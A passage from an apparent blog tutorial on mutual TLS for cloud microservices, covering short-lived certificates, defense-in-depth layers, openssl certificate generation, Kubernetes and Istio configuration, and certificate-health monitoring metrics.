&lt;strong&gt;Order Service → Shipping API&lt;/strong&gt; (mTLS): Create shipping label&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order Service → Order DB&lt;/strong&gt; (mTLS): Save order record&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Every single internal connection (steps 2-11) uses mTLS.&lt;/strong&gt; This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each service verifies the identity of the caller&lt;/li&gt;
&lt;li&gt;An attacker can't impersonate the Payment Service to steal payment data&lt;/li&gt;
&lt;li&gt;If the Cart Service is compromised, it still can't access the Order DB (no valid certificate)&lt;/li&gt;
&lt;li&gt;Audit logs show exactly which service made each request&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Security Benefits in This Architecture
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Isolation&lt;/strong&gt;: Even if an attacker compromises the Product Service, they can't access the Payment Service without its certificate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Least Privilege&lt;/strong&gt;: Each service only has certificates for the connections it needs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance&lt;/strong&gt;: Meets PCI DSS requirements for payment processing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auditability&lt;/strong&gt;: Every connection is logged with the service identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust&lt;/strong&gt;: Network location doesn't matter - a service must prove its identity regardless&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is a production-grade architecture used by major e-commerce platforms to protect millions of transactions daily.&lt;/p&gt;

&lt;h2&gt;
  
  
  Benefits and Trade-offs
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Benefits
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Strong Authentication&lt;/strong&gt;: Both parties verify each other's identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust Architecture&lt;/strong&gt;: No implicit trust based on network location&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encryption&lt;/strong&gt;: All data in transit is encrypted&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance&lt;/strong&gt;: Meets regulatory requirements (PCI DSS, HIPAA, SOC 2)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auditability&lt;/strong&gt;: Clear record of which services communicate&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Trade-offs
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Complexity&lt;/strong&gt;: More moving parts to manage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Performance&lt;/strong&gt;: Additional handshake overhead (typically 1-5ms)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate Management&lt;/strong&gt;: Requires robust PKI infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Debugging&lt;/strong&gt;: Encrypted traffic is harder to troubleshoot&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Initial Setup&lt;/strong&gt;: Steeper learning curve&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Best Practices for Cloud mTLS
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Use Short-Lived Certificates
&lt;/h3&gt;

&lt;p&gt;One of the most important security practices is using certificates that expire quickly:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u9ghyptw5awxi10tf7f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u9ghyptw5awxi10tf7f.png" alt="short-lived certificates" width="800" height="308"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why 24-hour certificates improve security:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reduced Blast Radius:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If an attacker steals a certificate's private key, they can only use it for 24 hours&lt;/li&gt;
&lt;li&gt;Compare this to a 1-year certificate - an attacker has 365 days to exploit it&lt;/li&gt;
&lt;li&gt;Even if you detect a breach, short-lived certs naturally expire quickly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: If a developer accidentally commits a private key to GitHub, it's only valid until tomorrow&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Automatic Rotation:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;With 24-hour certs, automation isn't optional - it's required&lt;/li&gt;
&lt;li&gt;This forces you to build robust certificate rotation systems from day one&lt;/li&gt;
&lt;li&gt;Your systems become resilient to certificate expiration issues&lt;/li&gt;
&lt;li&gt;You catch configuration problems within 24 hours instead of discovering them a year later&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Less Manual Intervention:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Nobody can manage daily certificate rotation manually&lt;/li&gt;
&lt;li&gt;This eliminates human error (forgetting to renew, typos in configuration)&lt;/li&gt;
&lt;li&gt;No more "emergency" certificate renewals at 2 AM&lt;/li&gt;
&lt;li&gt;Operators don't need to track expiration dates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;All paths lead to better security:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Short-lived certificates force good practices&lt;/li&gt;
&lt;li&gt;Automation reduces errors&lt;/li&gt;
&lt;li&gt;Limited validity period contains breaches&lt;/li&gt;
&lt;li&gt;The system becomes "self-healing" with automatic rotation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Traditional thinking&lt;/strong&gt;: "Long-lived certificates are easier to manage"&lt;br&gt;
&lt;strong&gt;Modern reality&lt;/strong&gt;: "Short-lived certificates are safer and actually easier when automated"&lt;/p&gt;
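
&lt;p&gt;As a hedged sketch of what "short-lived" looks like with plain openssl (file names such as &lt;code&gt;ca.crt&lt;/code&gt; and &lt;code&gt;svc.key&lt;/code&gt; are placeholders; in production a managed CA or cert-manager issues these automatically):&lt;/p&gt;

```shell
# Throwaway CA for the demo (in production: your managed/private CA)
openssl req -x509 -newkey rsa:2048 -nodes -days 7 \
  -keyout ca.key -out ca.crt -subj "/CN=demo-ca"

# Key + CSR for the service (placeholder CN)
openssl req -new -newkey rsa:2048 -nodes \
  -keyout svc.key -out svc.csr \
  -subj "/CN=svc.default.svc.cluster.local"

# Sign for 1 day only; rotation then has to be automated
openssl x509 -req -in svc.csr -CA ca.crt -CAkey ca.key \
  -CAcreateserial -out svc.crt -days 1
```

&lt;p&gt;Verifying the chain with &lt;code&gt;openssl verify -CAfile ca.crt svc.crt&lt;/code&gt; should succeed, and the certificate simply stops working after 24 hours - no revocation step required.&lt;/p&gt;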
&lt;h3&gt;
  
  
  2. Automate Everything
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Certificate issuance&lt;/li&gt;
&lt;li&gt;Certificate rotation&lt;/li&gt;
&lt;li&gt;Certificate revocation&lt;/li&gt;
&lt;li&gt;Monitoring and alerting&lt;/li&gt;
&lt;/ul&gt;
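
&lt;p&gt;As a sketch of what "automate issuance and rotation" can look like with cert-manager, a &lt;code&gt;Certificate&lt;/code&gt; resource pairs a short &lt;code&gt;duration&lt;/code&gt; with a &lt;code&gt;renewBefore&lt;/code&gt; window; the names and the Issuer below are illustrative placeholders:&lt;/p&gt;

```yaml
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: svc-cert            # placeholder name
spec:
  secretName: svc-certs     # Secret where the rotated cert/key pair lands
  duration: 24h             # short-lived, per the practice above
  renewBefore: 8h           # re-issue while 8h of validity remain
  dnsNames:
    - svc.default.svc.cluster.local
  issuerRef:
    name: internal-ca       # placeholder Issuer
    kind: Issuer
```

&lt;p&gt;cert-manager then re-issues and updates the Secret on its own; workloads that reload certificates from the Secret never see an expiry.&lt;/p&gt;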
&lt;h3&gt;
  
  
  3. Use Service Mesh
&lt;/h3&gt;

&lt;p&gt;Service meshes like Istio, Linkerd, or AWS App Mesh handle mTLS automatically:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Transparent to application code&lt;/li&gt;
&lt;li&gt;Automatic certificate rotation&lt;/li&gt;
&lt;li&gt;Built-in observability&lt;/li&gt;
&lt;li&gt;Policy enforcement&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  4. Implement Defense in Depth
&lt;/h3&gt;

&lt;p&gt;mTLS shouldn't be your only security measure. It's one layer in a comprehensive security strategy:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjn48bwcpqtfzsidwc6zy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjn48bwcpqtfzsidwc6zy.png" alt="defence in depth" width="800" height="104"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding each security layer:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1: Network Policies (Foundation)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Kubernetes NetworkPolicy or cloud security groups&lt;/li&gt;
&lt;li&gt;Controls which pods/services can even attempt to connect&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Cart Service can only receive traffic from API Gateway"&lt;/li&gt;
&lt;li&gt;Think of it as closing all doors and windows, then only opening specific ones&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Benefit&lt;/strong&gt;: Even before mTLS kicks in, most connections are blocked at the network level&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 2: mTLS (Highlighted in red)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Service-to-service identity verification and encryption&lt;/li&gt;
&lt;li&gt;Even if network policy allows a connection, both services must authenticate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "I allow Cart Service to connect, but you must prove you ARE Cart Service"&lt;/li&gt;
&lt;li&gt;Prevents man-in-the-middle attacks and eavesdropping&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;This is the focus of this blog post&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 3: Application Authentication (User Identity)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;JWT tokens, OAuth, or session cookies&lt;/li&gt;
&lt;li&gt;Validates that the end user is who they claim to be&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "The service calling me is authenticated (mTLS), but is the user's token valid?"&lt;/li&gt;
&lt;li&gt;mTLS proves the SERVICE identity, JWT proves the USER identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real scenario&lt;/strong&gt;: Payment Service uses mTLS to verify it's talking to Order Service, then checks the JWT to verify the user has permission to make this purchase&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 4: Authorization (Permission Check)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;RBAC (Role-Based Access Control) or ABAC (Attribute-Based Access Control)&lt;/li&gt;
&lt;li&gt;Even authenticated users shouldn't access everything&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "You're authenticated, but are you allowed to view THIS order?"&lt;/li&gt;
&lt;li&gt;Implements the principle of least privilege&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real scenario&lt;/strong&gt;: User is authenticated (Layer 3), but can only view their own orders, not other customers' orders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Layer 5: Audit Logging (Detection &amp;amp; Forensics)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CloudTrail (AWS), Cloud Logging (GCP), Azure Monitor&lt;/li&gt;
&lt;li&gt;Records who did what, when, and from where&lt;/li&gt;
&lt;li&gt;Enables security investigations and compliance reporting&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Service X accessed Database Y at 2:15 PM using certificate Z"&lt;/li&gt;
&lt;li&gt;Helps detect anomalies and trace security incidents&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;How the layers work together:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Imagine an attacker tries to steal customer data:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1 blocks&lt;/strong&gt;: Network policy prevents random pods from accessing the database&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2 blocks&lt;/strong&gt;: Without a valid certificate, can't establish mTLS connection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3 blocks&lt;/strong&gt;: Even with a certificate, need a valid user JWT token&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 4 blocks&lt;/strong&gt;: Even with authentication, authorization check fails ("you can't access this data")&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 5 detects&lt;/strong&gt;: All failed attempts are logged for security team review&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;An attacker must bypass ALL layers to succeed.&lt;/strong&gt; This is why it's called "defense in depth" - multiple independent security controls that work together.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world example - compromised service:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let's say an attacker compromises the Product Service:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1&lt;/strong&gt;: NetworkPolicy prevents Product Service from connecting to Order DB (it shouldn't need to)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2&lt;/strong&gt;: Product Service doesn't have certificates for Order Service or Payment Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3&lt;/strong&gt;: Product Service can't forge JWT tokens for users&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 4&lt;/strong&gt;: Even if it could connect, authorization rules prevent it from accessing order data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 5&lt;/strong&gt;: Any suspicious behavior is logged and alerted&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The compromise is contained to just the Product Service - the attacker can't pivot to sensitive financial data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why mTLS alone isn't enough:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;mTLS proves service identity, but not user authorization&lt;/li&gt;
&lt;li&gt;A compromised service with valid certificates could still abuse its access&lt;/li&gt;
&lt;li&gt;Multiple layers provide redundancy - if one fails, others still protect you&lt;/li&gt;
&lt;li&gt;Each layer addresses different threat vectors&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This layered approach is the industry standard for securing cloud applications and is required for compliance with standards like PCI DSS, SOC 2, and HIPAA.&lt;/p&gt;
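
&lt;p&gt;Layer 1 of this stack translates directly into a Kubernetes NetworkPolicy. A hedged sketch of the "Cart Service only accepts traffic from the API Gateway" rule, with illustrative labels and namespace:&lt;/p&gt;

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: cart-allow-gateway-only   # placeholder name
  namespace: shop                 # placeholder namespace
spec:
  podSelector:
    matchLabels:
      app: cart-service           # the pods being protected
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: api-gateway    # the only allowed caller
```

&lt;p&gt;Any other pod's connection attempt is dropped at the network layer, before mTLS (Layer 2) is even consulted.&lt;/p&gt;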
&lt;h2&gt;
  
  
  Getting Started: Step-by-Step
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Step 1: Set Up a Certificate Authority
&lt;/h3&gt;

&lt;p&gt;Choose between:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cloud-native&lt;/strong&gt;: AWS Private CA, GCP Certificate Authority Service, Azure Key Vault&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Self-hosted&lt;/strong&gt;: HashiCorp Vault, cert-manager (Kubernetes)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed service mesh&lt;/strong&gt;: Istio CA, Linkerd CA&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Step 2: Generate Certificates
&lt;/h3&gt;

&lt;p&gt;For a service:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Example: Generate a certificate request&lt;/span&gt;
openssl req &lt;span class="nt"&gt;-new&lt;/span&gt; &lt;span class="nt"&gt;-newkey&lt;/span&gt; rsa:2048 &lt;span class="nt"&gt;-nodes&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-keyout&lt;/span&gt; service-a.key &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-out&lt;/span&gt; service-a.csr &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-subj&lt;/span&gt; &lt;span class="s2"&gt;"/CN=service-a.default.svc.cluster.local"&lt;/span&gt;

&lt;span class="c"&gt;# Sign with CA&lt;/span&gt;
openssl x509 &lt;span class="nt"&gt;-req&lt;/span&gt; &lt;span class="nt"&gt;-in&lt;/span&gt; service-a.csr &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-CA&lt;/span&gt; ca.crt &lt;span class="nt"&gt;-CAkey&lt;/span&gt; ca.key &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-out&lt;/span&gt; service-a.crt &lt;span class="nt"&gt;-days&lt;/span&gt; 365
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Configure Your Services
&lt;/h3&gt;

&lt;p&gt;Example Kubernetes configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Secret&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;service-a-certs&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kubernetes.io/tls&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;tls.crt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;base64-encoded-cert&amp;gt;&lt;/span&gt;
  &lt;span class="na"&gt;tls.key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;base64-encoded-key&amp;gt;&lt;/span&gt;
  &lt;span class="na"&gt;ca.crt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;&amp;lt;base64-encoded-ca&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Enable mTLS in Your Service Mesh
&lt;/h3&gt;

&lt;p&gt;Example Istio configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;security.istio.io/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;PeerAuthentication&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;mtls&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STRICT&lt;/span&gt;  &lt;span class="c1"&gt;# Enforce mTLS for all services&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Monitoring and Troubleshooting
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Key Metrics to Monitor
&lt;/h3&gt;

&lt;p&gt;Effective mTLS requires comprehensive monitoring. Here are the critical metrics organized by category:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fst9t8509a5ppri80wtm6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fst9t8509a5ppri80wtm6.png" alt="key metrics to monitor" width="800" height="82"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Certificate Health Metrics - Proactive Monitoring:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M1: Days Until Expiration&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Track how many days remain until each certificate expires&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Minimum expiration time across all certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Prevents service outages from expired certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Less than 7 days (highlighted in red)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Best practice&lt;/strong&gt;: Scale the threshold to the certificate lifetime - a 24-hour certificate is always inside a 7-day window, so alert when only a few hours remain instead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example alert&lt;/strong&gt;: "Payment Service certificate expires in 6 days - rotation may be failing"&lt;/li&gt;
&lt;/ul&gt;
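
&lt;p&gt;M1 can be probed directly with openssl: &lt;code&gt;-checkend&lt;/code&gt; takes a window in seconds and exits non-zero if the certificate expires inside it. The self-signed 30-day certificate below exists only so the check has something to run against:&lt;/p&gt;

```shell
# Throwaway 30-day self-signed cert (placeholder subject)
openssl req -x509 -newkey rsa:2048 -nodes -days 30 \
  -keyout tls.key -out tls.crt -subj "/CN=demo"

# Print the expiry date
openssl x509 -enddate -noout -in tls.crt

# 604800 s = 7 days: exit 0 means safe, non-zero means "expires soon"
if openssl x509 -checkend 604800 -noout -in tls.crt; then
  echo "OK: more than 7 days of validity left"
else
  echo "ALERT: certificate expires within 7 days"
fi
```

&lt;p&gt;Wrapped in a cron job or exporter, this one-liner is the simplest possible implementation of the M1 alert.&lt;/p&gt;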

&lt;p&gt;&lt;strong&gt;M2: Failed Validations&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Count how many times certificate validation fails&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Rate of validation failures per service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Indicates certificate issues, CA problems, or misconfiguration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Any increase from baseline (orange alert)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Common causes&lt;/strong&gt;: Clock skew, expired CA certificates, network issues reaching CA&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "User Service failing to validate Order Service certificate - CA unreachable"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M3: Rotation Success Rate&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Percentage of successful certificate rotations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Success rate over time, broken down by service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Ensures automation is working properly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Target&lt;/strong&gt;: Should be 99.9%+ for production systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What can go wrong&lt;/strong&gt;: CA outages, permission issues, secret store unavailable&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Cart Service rotation success rate dropped to 95% - investigate"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Connection Metrics - Performance and Reliability:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M4: TLS Handshake Duration&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Time taken to complete the mTLS handshake&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: P50, P95, P99 latency percentiles&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Slow handshakes impact user experience&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Typical values&lt;/strong&gt;: 1-5ms for local services, 10-50ms for cross-region&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Red flags&lt;/strong&gt;: Sudden increases indicate CA problems or network issues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Handshake duration increased from 2ms to 50ms - CA performance degraded"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M5: Connection Failures&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Number of failed mTLS connection attempts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Failure rate and absolute count&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Alert threshold&lt;/strong&gt;: Any spike above baseline (orange alert)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: May indicate service outages, certificate problems, or attacks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Investigation steps&lt;/strong&gt;: Check certificate validity, network connectivity, CA availability&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "100 failed connections to Payment Service in last 5 minutes - investigating"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M6: Certificate Errors&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Specific types of certificate-related errors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Error categories (expired, invalid signature, wrong hostname, revoked)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Different errors require different fixes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Common errors&lt;/strong&gt;:

&lt;ul&gt;
&lt;li&gt;"Certificate expired": Rotation failed&lt;/li&gt;
&lt;li&gt;"Invalid signature": Certificate doesn't match CA&lt;/li&gt;
&lt;li&gt;"Hostname mismatch": Wrong certificate for this service&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Example&lt;/strong&gt;: "Payment Service receiving 'hostname mismatch' errors - certificate issued for wrong domain"&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Security Metrics - Threat Detection:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M7: Unauthorized Access Attempts&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Services or clients trying to connect without valid certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Source of attempts, target services, frequency&lt;/li&gt;
&lt;li&gt;
